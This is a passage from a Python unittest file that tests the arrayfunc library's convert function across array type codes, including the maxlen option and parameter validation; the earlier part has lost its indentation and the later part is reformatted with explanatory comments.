dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code H - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code H - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code H - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code H - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code H - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code H - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_i(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'i'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code i - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code i - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code i - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code i - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code i - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code i - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code i - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code i - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code i - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code i - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code i - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code i - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code i - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_i(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'i'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code i - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code i - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code i - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code i - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code i - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code i - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code i - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_I(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'I'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code I - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code I - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code I - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code I - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code I - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code I - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code I - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code I - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code I - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code I - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code I - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code I - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code I - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_I(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'I'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code I - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code I - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code I - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code I - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code I - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code I - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code I - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_l(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'l'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code l - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code l - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code l - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code l - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code l - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code l - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code l - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code l - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code l - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code l - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code l - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code l - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
	"""Test convert for basic operation in array code l - Test maxlen parameter.

	Convert only the first half of the array and verify the second half
	of the output array was left untouched.
	"""
	outputtest = 'l'
	testvals = TestData.TestLimits(self.TypeCode, outputtest)
	data = array.array(self.TypeCode, testvals)
	dataout = array.array(outputtest, itertools.repeat(0, len(data)))
	limlen = len(dataout) // 2
	# Save the second part of the output array so we can verify it is unchanged.
	originalout = dataout[limlen:]
	arrayfunc.convert(data, dataout, maxlen=limlen)
	# Only the first 'limlen' elements should have been converted.
	# (The unused 'converted' local that used to be created here was dead code.)
	for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
		self.assertEqual(dataoutitem, dataitem)
	# The data past 'maxlen' should be unchanged.
	for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
		self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_l(unittest.TestCase):
	"""Test parameter validation of the convert function for array code 'l'.
	param_template
	"""

	########################################################
	def setUp(self):
		"""Initialise.
		"""
		self.TypeCode = 'l'
		# Zero length array used for the empty array test.
		self.zerodata = array.array(self.TypeCode, [])

	########################################################
	def test_convert_params_01(self):
		"""Test convert for parameters in array code l - Zero length array.
		"""
		dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
		# Converting an empty array is an error.
		with self.assertRaises(IndexError):
			arrayfunc.convert(self.zerodata, dataout)

	########################################################
	def test_convert_params_02(self):
		"""Test convert for parameters in array code l - Unequal array length.
		"""
		testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
		data = array.array(self.TypeCode, testvals)
		# The output array is deliberately shorter than the input array.
		dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
		with self.assertRaises(IndexError):
			arrayfunc.convert(data, dataout)

	########################################################
	def test_convert_params_03(self):
		"""Test convert for parameters in array code l - Invalid input array data type.
		"""
		dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
		# The input must be an array, not an integer.
		with self.assertRaises(TypeError):
			arrayfunc.convert(99, dataout)

	########################################################
	def test_convert_params_04(self):
		"""Test convert for parameters in array code l - Invalid output array data type.
		"""
		data = array.array(self.TypeCode, itertools.repeat(0, 100))
		# The output must be an array, not an integer.
		with self.assertRaises(TypeError):
			arrayfunc.convert(data, 99)

	########################################################
	def test_convert_params_05(self):
		"""Test convert for parameters in array code l - All parameters missing.
		"""
		# Calling with no arguments at all must fail.
		with self.assertRaises(TypeError):
			arrayfunc.convert()

	########################################################
	def test_convert_params_06(self):
		"""Test convert for parameters in array code l - Second parameter missing.
		"""
		data = array.array(self.TypeCode, itertools.repeat(0, 100))
		# Supply only the first parameter; the missing output array must be
		# rejected. (The original test passed no arguments at all, which
		# duplicated test_convert_params_05 instead of testing this case.)
		with self.assertRaises(TypeError):
			arrayfunc.convert(data)

	########################################################
	def test_convert_params_07(self):
		"""Test convert for parameters in array code l - Too many parameters.
		"""
		outputtest = 'b'
		testvals = TestData.TestLimits(self.TypeCode, outputtest)
		data = array.array(self.TypeCode, testvals)
		dataout = array.array(outputtest, itertools.repeat(0, len(data)))
		# An extra positional parameter must be rejected.
		with self.assertRaises(TypeError):
			arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_L(unittest.TestCase):
	"""Test for basic convert function for array code 'L'.
	op_template
	"""

	##############################################################################
	def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
		"""This function is patched into assertEqual to allow testing for
		the floating point special values NaN, Inf, and -Inf.
		"""
		# NaN cannot be compared using normal means.
		if math.isnan(dataoutitem) and math.isnan(expecteditem):
			pass
		# Anything else can be compared normally.
		else:
			if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
				raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))

	########################################################
	def setUp(self):
		"""Initialise.
		"""
		# Route float comparisons through FloatassertEqual so NaN and
		# approximately-equal values compare as intended.
		self.addTypeEqualityFunc(float, self.FloatassertEqual)
		self.TypeCode = 'L'

	########################################################
	def _checkconvert_int(self, outputtest):
		"""Convert to the integer array code 'outputtest' and check that each
		output element equals the corresponding input element.
		"""
		testvals = TestData.TestLimits(self.TypeCode, outputtest)
		data = array.array(self.TypeCode, testvals)
		dataout = array.array(outputtest, itertools.repeat(0, len(data)))
		arrayfunc.convert(data, dataout)
		for dataitem, dataoutitem in zip(data, dataout):
			self.assertEqual(dataoutitem, dataitem)

	########################################################
	def _checkconvert_float(self, outputtest):
		"""Convert to the floating point array code 'outputtest' and check that
		each output element equals the corresponding input element.
		"""
		testvals = TestData.TestLimits(self.TypeCode, outputtest)
		data = array.array(self.TypeCode, testvals)
		dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
		arrayfunc.convert(data, dataout)
		# Both parameters to assertEqual must be floating point in order
		# for the floating point comparison to use FloatassertEqual.
		for dataitem, dataoutitem in zip(data, dataout):
			self.assertEqual(dataoutitem, float(dataitem))

	########################################################
	def test_convert_ops_01(self):
		"""Test convert for basic operation in array code L - Convert to array code b.
		"""
		self._checkconvert_int('b')

	########################################################
	def test_convert_ops_02(self):
		"""Test convert for basic operation in array code L - Convert to array code B.
		"""
		self._checkconvert_int('B')

	########################################################
	def test_convert_ops_03(self):
		"""Test convert for basic operation in array code L - Convert to array code h.
		"""
		self._checkconvert_int('h')

	########################################################
	def test_convert_ops_04(self):
		"""Test convert for basic operation in array code L - Convert to array code H.
		"""
		self._checkconvert_int('H')

	########################################################
	def test_convert_ops_05(self):
		"""Test convert for basic operation in array code L - Convert to array code i.
		"""
		self._checkconvert_int('i')

	########################################################
	def test_convert_ops_06(self):
		"""Test convert for basic operation in array code L - Convert to array code I.
		"""
		self._checkconvert_int('I')

	########################################################
	def test_convert_ops_07(self):
		"""Test convert for basic operation in array code L - Convert to array code l.
		"""
		self._checkconvert_int('l')

	########################################################
	def test_convert_ops_08(self):
		"""Test convert for basic operation in array code L - Convert to array code L.
		"""
		self._checkconvert_int('L')

	########################################################
	def test_convert_ops_09(self):
		"""Test convert for basic operation in array code L - Convert to array code q.
		"""
		self._checkconvert_int('q')

	########################################################
	def test_convert_ops_10(self):
		"""Test convert for basic operation in array code L - Convert to array code Q.
		"""
		self._checkconvert_int('Q')

	########################################################
	def test_convert_ops_11(self):
		"""Test convert for basic operation in array code L - Convert to array code f.
		"""
		self._checkconvert_float('f')

	########################################################
	def test_convert_ops_12(self):
